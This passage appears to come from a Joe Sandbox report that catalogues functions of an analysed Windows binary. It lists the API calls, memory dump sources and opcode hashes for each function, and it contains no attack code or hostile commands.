                                                                                                                                                                                                                                          • Opcode ID: 67bf3fe6ff516e39ab500dc241b83f6e2887c2a42ff0cd8adff359b1629f2dcd
                                                                                                                                                                                                                                          • Instruction ID: b938baf75a1f8d12e2a314ecfd83de4db4068f60f621e5942b87cf1b44ec5e0b
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 67bf3fe6ff516e39ab500dc241b83f6e2887c2a42ff0cd8adff359b1629f2dcd
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 6F416D31A0865AFFDF199F65D848BEEB774FF05320F20825AE429A32D0C7706960CB91
                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                          Function 00143874 Relevance: 7.6, APIs: 5, Instructions: 101windowCOMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • GetInputState.USER32 ref: 001438CB
                                                                                                                                                                                                                                          • TranslateAcceleratorW.USER32(?,00000000,?), ref: 00143922
                                                                                                                                                                                                                                          • TranslateMessage.USER32(?), ref: 0014394B
                                                                                                                                                                                                                                          • DispatchMessageW.USER32(?), ref: 00143955
                                                                                                                                                                                                                                          • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00143966
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000004.00000002.2414085590.00000000000D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 000D0000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414050756.00000000000D0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414160293.000000000016C000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414160293.0000000000192000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414251081.000000000019C000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414288663.00000000001A4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_d0000_b3168c3d9b.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: Message$Translate$AcceleratorDispatchInputPeekState
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 2256411358-0
                                                                                                                                                                                                                                          • Opcode ID: 28c12123f213b6de0a1f6fe64771bdd06aaf6a8d665d0198c5b9c7caf5fa4ea3
                                                                                                                                                                                                                                          • Instruction ID: 1c0ebd25e2dcf4643ff86429cca7cd077a4101c244756d3b4c5caff704dbe8cd
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 28c12123f213b6de0a1f6fe64771bdd06aaf6a8d665d0198c5b9c7caf5fa4ea3
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: DD319370904342AEEB39CB35DC49BB777A8AB16308F04456DE4B2C29B0E7F49AC5CB51
                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                          Function 0014CF1A Relevance: 7.6, APIs: 5, Instructions: 93networkfileCOMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • InternetQueryDataAvailable.WININET(?,?,00000000,00000000), ref: 0014CF38
                                                                                                                                                                                                                                          • InternetReadFile.WININET(?,00000000,?,?), ref: 0014CF6F
                                                                                                                                                                                                                                          • GetLastError.KERNEL32(?,00000000,?,?,?,0014C21E,00000000), ref: 0014CFB4
                                                                                                                                                                                                                                          • SetEvent.KERNEL32(?,?,00000000,?,?,?,0014C21E,00000000), ref: 0014CFC8
                                                                                                                                                                                                                                          • SetEvent.KERNEL32(?,?,00000000,?,?,?,0014C21E,00000000), ref: 0014CFF2
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000004.00000002.2414085590.00000000000D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 000D0000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414050756.00000000000D0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414160293.000000000016C000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414160293.0000000000192000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414251081.000000000019C000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414288663.00000000001A4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_d0000_b3168c3d9b.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: EventInternet$AvailableDataErrorFileLastQueryRead
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 3191363074-0
                                                                                                                                                                                                                                          • Opcode ID: ea2b0466d31de983ac290d17c6ed251034fcebcf506ea66ef93601dc0b559107
                                                                                                                                                                                                                                          • Instruction ID: f6e7d70cb0107a351f7defc3587aa06c33c9d00fcdd1515d81bc3eafef38cd6c
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: ea2b0466d31de983ac290d17c6ed251034fcebcf506ea66ef93601dc0b559107
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 2B318E71605206EFDB64DFA5CC84ABBBBF9EB14310B10442EF506E2121DB74AE45DBA0
                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                          Function 00131901 Relevance: 7.6, APIs: 5, Instructions: 93sleepwindowCOMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • GetWindowRect.USER32(?,?), ref: 00131915
                                                                                                                                                                                                                                          • PostMessageW.USER32(00000001,00000201,00000001), ref: 001319C1
                                                                                                                                                                                                                                          • Sleep.KERNEL32(00000000,?,?,?), ref: 001319C9
                                                                                                                                                                                                                                          • PostMessageW.USER32(00000001,00000202,00000000), ref: 001319DA
                                                                                                                                                                                                                                          • Sleep.KERNEL32(00000000,?,?,?,?), ref: 001319E2
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000004.00000002.2414085590.00000000000D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 000D0000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414050756.00000000000D0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414160293.000000000016C000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414160293.0000000000192000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414251081.000000000019C000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414288663.00000000001A4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_d0000_b3168c3d9b.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: MessagePostSleep$RectWindow
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 3382505437-0
                                                                                                                                                                                                                                          • Opcode ID: c7dfb406b87df8620a35c7e6aa184a882667a41010467c01bd3633a62d47449e
                                                                                                                                                                                                                                          • Instruction ID: db23624be19df6f15db40e6e187ea2833238d4b6a099bffc7103e9a7551f9116
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: c7dfb406b87df8620a35c7e6aa184a882667a41010467c01bd3633a62d47449e
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: D631A271900219FFDB04CFA8CD99BEE7BB5EB45319F104225F961A72D1C7B09954CB90
                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                          Function 00165706 Relevance: 7.6, APIs: 5, Instructions: 82windowCOMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • SendMessageW.USER32(?,00001053,000000FF,?), ref: 00165745
                                                                                                                                                                                                                                          • SendMessageW.USER32(?,00001074,?,00000001), ref: 0016579D
                                                                                                                                                                                                                                          • _wcslen.LIBCMT ref: 001657AF
                                                                                                                                                                                                                                          • _wcslen.LIBCMT ref: 001657BA
                                                                                                                                                                                                                                          • SendMessageW.USER32(?,00001002,00000000,?), ref: 00165816
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000004.00000002.2414085590.00000000000D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 000D0000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414050756.00000000000D0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414160293.000000000016C000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414160293.0000000000192000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414251081.000000000019C000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414288663.00000000001A4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_d0000_b3168c3d9b.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: MessageSend$_wcslen
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 763830540-0
                                                                                                                                                                                                                                          • Opcode ID: 7f50e33b97fc833d6e9c0f9bf765547d4b122d40188018cf65bcb79cb905bf98
                                                                                                                                                                                                                                          • Instruction ID: eaf9f26b91d7a3b6ea89d672deea2622f9c1b6772e237cde4168125689058d91
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 7f50e33b97fc833d6e9c0f9bf765547d4b122d40188018cf65bcb79cb905bf98
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: B1219671904618DADB209FA0CC85AFE7BB9FF04724F108256F929EB1C1E7709995CF50
                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                          Function 00150930 Relevance: 7.6, APIs: 5, Instructions: 69COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • IsWindow.USER32(00000000), ref: 00150951
                                                                                                                                                                                                                                          • GetForegroundWindow.USER32 ref: 00150968
                                                                                                                                                                                                                                          • GetDC.USER32(00000000), ref: 001509A4
                                                                                                                                                                                                                                          • GetPixel.GDI32(00000000,?,00000003), ref: 001509B0
                                                                                                                                                                                                                                          • ReleaseDC.USER32(00000000,00000003), ref: 001509E8
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000004.00000002.2414085590.00000000000D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 000D0000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414050756.00000000000D0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414160293.000000000016C000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414160293.0000000000192000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414251081.000000000019C000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414288663.00000000001A4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_d0000_b3168c3d9b.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: Window$ForegroundPixelRelease
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 4156661090-0
                                                                                                                                                                                                                                          • Opcode ID: a8ab68218141408ffadaf3bfcd5e9c1e43dc239d599a809f908bf0530ff1d337
                                                                                                                                                                                                                                          • Instruction ID: bbf156b6666c4979c92c7ef331f819d44471c8fba55cf441d68faf5c2f213db6
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: a8ab68218141408ffadaf3bfcd5e9c1e43dc239d599a809f908bf0530ff1d337
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 32218135600204EFD704EF65DC84AAEBBE5FF58701F048069E85AE7762CB70AC44CBA0
                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                          Function 0010CDBD Relevance: 7.6, APIs: 5, Instructions: 68COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • GetEnvironmentStringsW.KERNEL32 ref: 0010CDC6
                                                                                                                                                                                                                                          • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0010CDE9
                                                                                                                                                                                                                                            • Part of subcall function 00103820: RtlAllocateHeap.NTDLL(00000000,?,001A1444,?,000EFDF5,?,?,000DA976,00000010,001A1440,000D13FC,?,000D13C6,?,000D1129), ref: 00103852
                                                                                                                                                                                                                                          • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 0010CE0F
                                                                                                                                                                                                                                          • _free.LIBCMT ref: 0010CE22
                                                                                                                                                                                                                                          • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 0010CE31
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000004.00000002.2414085590.00000000000D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 000D0000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414050756.00000000000D0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414160293.000000000016C000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414160293.0000000000192000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414251081.000000000019C000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414288663.00000000001A4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_d0000_b3168c3d9b.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: ByteCharEnvironmentMultiStringsWide$AllocateFreeHeap_free
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 336800556-0
                                                                                                                                                                                                                                          • Opcode ID: c6f215fb47acdb34f24edec2c7660a4239c488bf71e299ed7515e5218af56d28
                                                                                                                                                                                                                                          • Instruction ID: 5939dccbc71fa39f912555309d4bf81e96c36b1d4be49be83954f00f4e9476b8
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: c6f215fb47acdb34f24edec2c7660a4239c488bf71e299ed7515e5218af56d28
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: A30184726012157FA32127BAAC8CD7F6D6DEFC6BA13154229FD85C7281EBE18D0199F0
                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                          Function 000E9639 Relevance: 7.6, APIs: 5, Instructions: 66COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 000E9693
                                                                                                                                                                                                                                          • SelectObject.GDI32(?,00000000), ref: 000E96A2
                                                                                                                                                                                                                                          • BeginPath.GDI32(?), ref: 000E96B9
                                                                                                                                                                                                                                          • SelectObject.GDI32(?,00000000), ref: 000E96E2
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000004.00000002.2414085590.00000000000D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 000D0000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414050756.00000000000D0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414160293.000000000016C000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414160293.0000000000192000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414251081.000000000019C000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414288663.00000000001A4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_d0000_b3168c3d9b.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: ObjectSelect$BeginCreatePath
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 3225163088-0
                                                                                                                                                                                                                                          • Opcode ID: f0ae4df603f56c7568227138d178eee8ad591d85f6fca9c5a7b3cfa4dc27c516
                                                                                                                                                                                                                                          • Instruction ID: 29c22a4d839ac5c46d4cf5b3494ba73c1097ddd1d7a7572c5d8d51dd1fc8136c
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: f0ae4df603f56c7568227138d178eee8ad591d85f6fca9c5a7b3cfa4dc27c516
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 00219F70802385FFDB119F26EC187BE7BA9BB02359F104216F450A65B0D3B099D1CF94
                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                          Function 00135711 Relevance: 7.6, APIs: 5, Instructions: 61COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000004.00000002.2414085590.00000000000D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 000D0000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414050756.00000000000D0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414160293.000000000016C000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414160293.0000000000192000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414251081.000000000019C000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414288663.00000000001A4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_d0000_b3168c3d9b.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: _memcmp
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 2931989736-0
                                                                                                                                                                                                                                          • Opcode ID: 317606c1ae7c4ee49f5cc97b777d8606ab7d3d9b10c0b99adb22d352dcc3ce6d
                                                                                                                                                                                                                                          • Instruction ID: 7fecf5036287285e7eab0f8f5c0c93e9e69f08d9761ea12679f1930ee6cb35b3
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 317606c1ae7c4ee49f5cc97b777d8606ab7d3d9b10c0b99adb22d352dcc3ce6d
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: E801B571645609FBD3085510AD83FFB735F9B31BA4F814024FE049A642F760EE21D2E0
                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                          Function 00102DF8 Relevance: 7.6, APIs: 5, Instructions: 53COMMONLIBRARYCODE
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • GetLastError.KERNEL32(?,?,?,000FF2DE,00103863,001A1444,?,000EFDF5,?,?,000DA976,00000010,001A1440,000D13FC,?,000D13C6), ref: 00102DFD
                                                                                                                                                                                                                                          • _free.LIBCMT ref: 00102E32
                                                                                                                                                                                                                                          • _free.LIBCMT ref: 00102E59
                                                                                                                                                                                                                                          • SetLastError.KERNEL32(00000000,000D1129), ref: 00102E66
                                                                                                                                                                                                                                          • SetLastError.KERNEL32(00000000,000D1129), ref: 00102E6F
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000004.00000002.2414085590.00000000000D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 000D0000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414050756.00000000000D0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414160293.000000000016C000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414160293.0000000000192000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414251081.000000000019C000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414288663.00000000001A4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_d0000_b3168c3d9b.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: ErrorLast$_free
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 3170660625-0
                                                                                                                                                                                                                                          • Opcode ID: fbfb25961aab58300b802cffaab2373bd499910586e49b02e1fe7bfa246ced80
                                                                                                                                                                                                                                          • Instruction ID: 44e32bc46f9ba92c2ea773afc8b6267a98956a67d37fc4a1a335cf24829c0b8b
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: fbfb25961aab58300b802cffaab2373bd499910586e49b02e1fe7bfa246ced80
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: A201283628560067C6227774AC4DD3B265DBFE53B5B314029F8E5A32D2EFF08C414160
                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                          Function 0013000E Relevance: 7.5, APIs: 5, Instructions: 47stringCOMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • CLSIDFromProgID.OLE32(?,?,?,00000000,?,?,?,-C000001E,00000001,?,0012FF41,80070057,?,?,?,0013035E), ref: 0013002B
                                                                                                                                                                                                                                          • ProgIDFromCLSID.OLE32(?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,0012FF41,80070057,?,?), ref: 00130046
                                                                                                                                                                                                                                          • lstrcmpiW.KERNEL32(?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,0012FF41,80070057,?,?), ref: 00130054
                                                                                                                                                                                                                                          • CoTaskMemFree.OLE32(00000000,?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,0012FF41,80070057,?), ref: 00130064
                                                                                                                                                                                                                                          • CLSIDFromString.OLE32(?,?,?,?,?,00000000,?,?,?,-C000001E,00000001,?,0012FF41,80070057,?,?), ref: 00130070
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000004.00000002.2414085590.00000000000D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 000D0000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414050756.00000000000D0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414160293.000000000016C000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414160293.0000000000192000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414251081.000000000019C000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414288663.00000000001A4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_d0000_b3168c3d9b.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: From$Prog$FreeStringTasklstrcmpi
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 3897988419-0
                                                                                                                                                                                                                                          • Opcode ID: f8d3006641bad8e14063712f48c8005e2fdf0cad72d1ad8be8881a8a6c4d78a3
                                                                                                                                                                                                                                          • Instruction ID: cd1f8a3c55ea300e85187eed8c7a73114fdf4c42109591d3558b89f7e2dbb49d
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: f8d3006641bad8e14063712f48c8005e2fdf0cad72d1ad8be8881a8a6c4d78a3
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 5F01A272600214BFDB265F68DC44BBA7AEDEF48791F148128F945D3210D7B5DD808BA0
                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                          Function 0013E97B Relevance: 7.5, APIs: 5, Instructions: 47sleepCOMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • QueryPerformanceCounter.KERNEL32(?), ref: 0013E997
                                                                                                                                                                                                                                          • QueryPerformanceFrequency.KERNEL32(?), ref: 0013E9A5
                                                                                                                                                                                                                                          • Sleep.KERNEL32(00000000), ref: 0013E9AD
                                                                                                                                                                                                                                          • QueryPerformanceCounter.KERNEL32(?), ref: 0013E9B7
                                                                                                                                                                                                                                          • Sleep.KERNEL32 ref: 0013E9F3
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000004.00000002.2414085590.00000000000D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 000D0000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414050756.00000000000D0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414160293.000000000016C000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414160293.0000000000192000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414251081.000000000019C000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414288663.00000000001A4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_d0000_b3168c3d9b.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: PerformanceQuery$CounterSleep$Frequency
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 2833360925-0
                                                                                                                                                                                                                                          • Opcode ID: b02ecfb72faa6d5236a6ab9fcd57f9a9639952278bb6a6f71cc22ea87018c7e4
                                                                                                                                                                                                                                          • Instruction ID: dbf37614aa4d9b2885232d5022e519821ce96cbca7cc41efc03a6df9527eb68d
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: b02ecfb72faa6d5236a6ab9fcd57f9a9639952278bb6a6f71cc22ea87018c7e4
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: A7012931C01629DBCF04AFE5DC59AEDBBB8FF09705F010556E942B2281CB709695CBA1
                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                          Function 001310F9 Relevance: 7.5, APIs: 5, Instructions: 46memoryCOMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 00131114
                                                                                                                                                                                                                                          • GetLastError.KERNEL32(?,00000000,00000000,?,?,00130B9B,?,?,?), ref: 00131120
